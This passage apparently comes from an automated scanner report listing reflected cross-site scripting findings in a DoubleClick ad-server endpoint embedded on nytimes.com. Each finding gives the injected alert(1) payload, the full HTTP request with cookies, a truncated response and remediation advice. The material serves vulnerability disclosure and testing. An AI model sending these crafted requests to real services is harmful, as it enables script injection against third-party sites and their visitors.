3B4307-300/250%3B41996799/42014586/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265018%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRightf6485"-alert(1)-"096b3fe0a0&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/inte
...[SNIP]...

4.43. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [pos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bbcd'-alert(1)-'4023a71aeed was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight7bbcd'-alert(1)-'4023a71aeed&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
3B4307-300/250%3B41996799/42014586/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265018%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight7bbcd'-alert(1)-'4023a71aeed&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/inte
...[SNIP]...

4.44. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c9dc"-alert(1)-"de026531d4a was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda6c9dc"-alert(1)-"de026531d4a&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda6c9dc"-alert(1)-"de026531d4a&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;");
var fscUrl = url;
var fscUrlClickTagFound = fals
...[SNIP]...

4.45. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1620'-alert(1)-'bf7a9f817b6 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cdaa1620'-alert(1)-'bf7a9f817b6&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cdaa1620'-alert(1)-'bf7a9f817b6&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;\">
...[SNIP]...

4.46. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21b3d"-alert(1)-"15aabbab5ea was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb21b3d"-alert(1)-"15aabbab5ea&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ww.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb21b3d"-alert(1)-"15aabbab5ea&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799
...[SNIP]...

4.47. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4f2f'-alert(1)-'b6fb9d14bcc was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bba4f2f'-alert(1)-'b6fb9d14bcc&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ww.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bba4f2f'-alert(1)-'b6fb9d14bcc&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799
...[SNIP]...

4.48. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4247"-alert(1)-"8bdcaae1fe2 was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclickf4247"-alert(1)-"8bdcaae1fe2&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
dx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclickf4247"-alert(1)-"8bdcaae1fe2&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;");
var fscUrl
...[SNIP]...

4.49. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3263d'-alert(1)-'2764c1dfd7f was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick3263d'-alert(1)-'2764c1dfd7f&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
dx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick3263d'-alert(1)-'2764c1dfd7f&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;\">
...[SNIP]...

4.50. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90a97'-alert(1)-'a16d04ed375 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=130519866790a97'-alert(1)-'a16d04ed375&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
k.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=130519866790a97'-alert(1)-'a16d04ed375&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;\">
...[SNIP]...

4.51. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82a6c"-alert(1)-"89c361df78a was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=130519866782a6c"-alert(1)-"89c361df78a&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
k.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=130519866782a6c"-alert(1)-"89c361df78a&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;");
var fscUrl = url;
var fscU
...[SNIP]...

4.52. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9ad8'-alert(1)-'abd4b72ba03 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=gotoa9ad8'-alert(1)-'abd4b72ba03&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:37 GMT
Cache-Control: private, x-gzip-ok=""
